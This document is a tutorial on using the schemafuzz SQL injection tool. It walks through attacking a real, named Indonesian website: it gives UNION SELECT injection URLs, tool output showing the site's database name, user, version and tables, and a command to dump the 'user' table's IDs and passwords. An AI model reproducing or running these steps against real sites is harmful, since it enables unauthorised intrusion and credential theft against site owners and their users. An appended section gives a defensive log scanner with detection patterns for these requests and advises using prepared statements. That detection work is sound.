A quick guide to using Schemafuzz

What you need:

1. Python (http://www.python.org/ftp/python/2.5/python-2.5.msi)
2. Schemafuzz (http://darkc0de.com/others/schemafuzz.py)
3. Command prompt (CMD)

-----------------------------------------------------------------

1. Find a target website
for example: http://www.ditplb.or.id/profile.php?id=1


2. Find the database

for example: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de" --dbs


rsauron:darkc0de.com MySQL Injection DataExt & Fuzzer v3.0
-----------------------------------------------------------------
[+] URL:http://www.ditplb.or.id/profile.php?id=1+AND+2+UNION+SELECT+0,1,darkc0de
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t15618_plb
User: t15618_plbid@localhost
Version: 5.0.32-Debian_7etch8
[+] Starting current users database extraction...


[-] Done



3. Find the table names in the database

for example: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de" --schema -D t15618_plb


rsauron:darkc0de.com MySQL Injection DataExt & Fuzzer v3.0
-----------------------------------------------------------------
[+] URL:http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t15618_plb
User: t15618_plbid@localhost
Version: 5.0.32-Debian_7etch8
[+] Starting current users database extraction...

[Database]: t15618_plb

[Table: Columns]
[0]bukutamu: id,pengirim,email,pesan
[1]frm_daftarartikel: id_daf_art,id_kat,daftarartikel,pengirim
[2]frm_detailartikel: id_det_art,id_kat,id_daf_art,detailartikel,keterangan
[3]frm_kategori: id_kat,kategori
[4]kabupaten: ID_kab,ID_prop,Kabupaten
[5]pelatihan: ID,Pelatihan
[6]profile: ID_Profile,sinopsis,Profile
[7]propinsi: ID_prop,Propinsi
[8]sd: ID_sd,ID_1,SD,Detail
[9]sekolah: ID_sek,ID_prop,ID_kab,Sekolah,Alamat,Telp,Email
[10]user: ID_user,UserID,Password,Keterangan,Admin

[-] Done


There are 11 tables.



4. View the data in a table and its columns

for example: schemafuzz.py -e www.ditplb.or.id/profile.php?id=-1+union+select+0,1,darkc0de -d t15618_plb -t user -c ID_user,UserID,Password,Keterangan,Admin


rsauron:darkc0de.com MySQL Injection DataExt & Fuzzer v3.0
-----------------------------------------------------------------
[+] URL:http://www.ditplb.or.id/profile.php?id=-1+union+select+0,1,darkc0de
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t15618_plb
User: t15618_plbid@localhost
Version: 5.0.32-Debian_7etch8
[+] Extracting information from user table...


[-] Done


-------------------------------------------------------------------------------------

- The method above is for MySQL version 5
- For version 4, use the --fuzz option to find table and column names

for example: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de" --fuzz

Explanation of the options:
--fuzz <-- find column and table names on MySQL version 4
--schema <-- list table names
--dump <-- view the data in columns, tables and databases
--dbs <-- list databases
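
Seen from the server side, the requests shown above leave clear traces in the web access log. The following is an added example, not part of the original post and not schemafuzz code: a Python scanner that flags the UNION SELECT, always-false `AND 1=2` and `darkc0de` marker patterns visible in the URLs above. The log lines, client IPs and rule names are constructed for illustration, and a combined-format access log is assumed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Client IP and request target of a combined-format access log entry (assumed format).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*"')

# Indicators taken from the request URLs shown on this page (rule names are made up here).
RULES = {
    "union_select": re.compile(r"\bunion\b(?:\s|/\*.*?\*/)+(?:all(?:\s|/\*.*?\*/)+)?select\b", re.I),
    "always_false": re.compile(r"\band\s+(\d+)\s*=\s*(?!\1\b)\d+", re.I),  # e.g. AND 1=2
    "tool_marker": re.compile(r"darkc0de", re.I),
}

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /profile.php?id=1 HTTP/1.1" 200 512',
    '198.51.100.9 - - [01/Jan/2024:10:00:05 +0000] "GET /profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de HTTP/1.1" 200 498',
    '198.51.100.9 - - [01/Jan/2024:10:00:06 +0000] "GET /profile.php?id=-1%20union%2f**%2fselect%200,1,darkc0de HTTP/1.1" 200 498',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /search.php?q=student+union+and+1=1 HTTP/1.1" 200 733',
]

def decode(value, rounds=3):
    """URL-decode repeatedly so double-encoded payloads are normalised too."""
    for _ in range(rounds):
        nxt = unquote_plus(value)
        if nxt == value:
            break
        value = nxt
    return value

def scan(lines):
    """Return {client_ip: {rule_name: hit_count}} for requests matching any rule."""
    hits = defaultdict(lambda: defaultdict(int))
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand
        query = decode(m.group("target").partition("?")[2])
        for name, rx in RULES.items():
            if rx.search(query):
                hits[m.group("ip")][name] += 1
    return {ip: dict(rules) for ip, rules in hits.items()}

if __name__ == "__main__":
    for ip, rules in scan(SAMPLE_LOG).items():
        print(ip, rules)
```

The lasting fix is in the application itself: bind the `id` parameter through a prepared statement instead of concatenating it into the query, so log matching like this serves as detection rather than as the defence.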

